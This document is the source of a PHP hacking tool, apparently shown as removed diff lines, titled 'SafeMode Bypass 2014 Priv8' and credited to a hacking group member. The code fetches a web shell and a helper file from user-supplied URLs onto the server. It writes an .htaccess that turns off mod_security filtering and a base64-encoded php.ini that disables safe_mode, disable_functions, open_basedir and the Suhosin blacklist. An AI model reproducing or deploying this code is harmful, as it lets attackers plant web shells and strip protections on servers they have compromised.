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- <link href='' rel='stylesheet' type='text/css'>
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- body {
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- <?
- error_reporting(0);
- /*
- #######################################
- #SafeMode Bypass 2014 Priv8 #
- #Coded By Mauritania Attacker #
- #GreetZ To All AnonGhost MemberZ #
- #######################################
- */
- echo "<form method='POST'>
- <title>Bypass SafeMode 2014 Priv8</title>
- <center><pre><font color='green' face='Orbitron' size='6' face='Tahoma'>Bypass SafeMode 2014 Priv8</pre></font></center>
- <center><font color='red' size='2' face='shell'>Cwd</font><input type='text' size='40' name='zero' value=".dirname(__FILE__)." <font color='green' size='8' face='Tahoma'></font></center>
- <center><font color='red' size='2' face='shell'>Shell</font><input type='text' size='40' name='shell' value='' <font color='green' size='8' face='Tahoma'></font></center>
- <center><font color='red' size='2' face='shell'>ini.php</font><input type='text' size='40' name='rim' value='' <font color='green' size='8' face='Tahoma'></font></center>
- <p><center><input type='submit' value='Bypass SafeMode' name='start' <font color=red' face='Tahoma, Geneva, sans-serif' style='font-size: 12pt'><br></font></center></p>";
- echo "<p><center><textarea rows='12' cols='60' style='font-family: impact size: 2pt ; color: green; border: 1px dotted red'>Results Will Appear Here ^_^
- ";
- if($_POST['start']) {
- $zero = $_POST['zero'];
- $file = $_POST['shell'];
- $mauritania = $_POST['rim'];
- $htaccess = "<IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- SecFilterCheckURLEncoding Off
- SecFilterCheckCookieFormat Off
- SecFilterCheckUnicodeEncoding Off
- SecFilterNormalizeCookies Off
- </IfModule>
- <Limit GET POST>
- order deny,allow
- deny from all
- allow from all
- </Limit>
- <Limit PUT DELETE>
- order deny,allow
- deny from all
- </Limit>
- SetEnv PHPRC $zero/ghost/php.ini";
- $phpini = "c2FmZV9tb2RlID0gT0ZGDQpTYWZlX21vZGVfZ2lkID0gT0ZGDQpkaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkUNCmRpc2FibGVfY2xhc3NlcyA9IE5PTkUNCm9wZW5fYmFzZWRpciA9IE9GRg0Kc3Vob3Npbi5leGVjdXRvci5mdW5jLmJsYWNrbGlzdCA9IE5PTkU=";
- $dir = "ghost";
- if(file_exists($dir)) {
- echo "[+] ghost Folder Already Exist are you drunk :o xD !
- ";
- } else {
- @mkdir($dir); {
- echo "[+] ghost Folder Has Been Created Nygga :3 !
- ";
- } }
- # Generate Sh3LL
- $fopen = fopen("ghost/priv8.php5",'w');
- $shell = @file_get_contents($file);
- $swrite = fwrite($fopen ,$shell);
- if($swrite){
- echo "Shell Has Been Downloaded : $zero/ghost/priv8.php5
- ";
- } else {
- echo "Can't Download Shell :( do it manually :D
- ";
- }
- fclose($fopen);
- # Generate Htaccess
- $kolsv = fopen("ghost/.htaccess", "w");
- $hwrite = fwrite($kolsv, $htaccess);
- if($hwrite){
- echo ".htaccess Generated Successfully \!/
- ";
- } else {
- echo "Can't Generate Htaccess
- ";
- }
- fclose($kolsv);
- # Generate ini.php
- $xopen = fopen("ghost/ini.php",'w');
- $rim = @file_get_contents($mauritania);
- $zzz = fwrite($xopen ,$rim);
- if($zzz){
- echo "ini.php Has Been Downloaded \!/
- ";
- } else {
- echo "Can't Download ini.php :( do it manually :D
- ";
- }
- fclose($xopen);
- $ini = fopen("ghost/php.ini" ,"w");
- $php = fwrite($ini, base64_decode($phpini));
- if($php){
- echo "PHP.INI Generated Successfully \!/";
- } else {
- echo "[-] Can't Generate PHP.INI";
- }
- }
- echo "</textarea></center></p><pre></pre>";
- echo '<center><font color="#ee5500" size="3pt">Coded By Mauritania Attacker</font><br><font color="#ff8f00" size="1pt">GreetZ : AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG</font></center>';
- ?>
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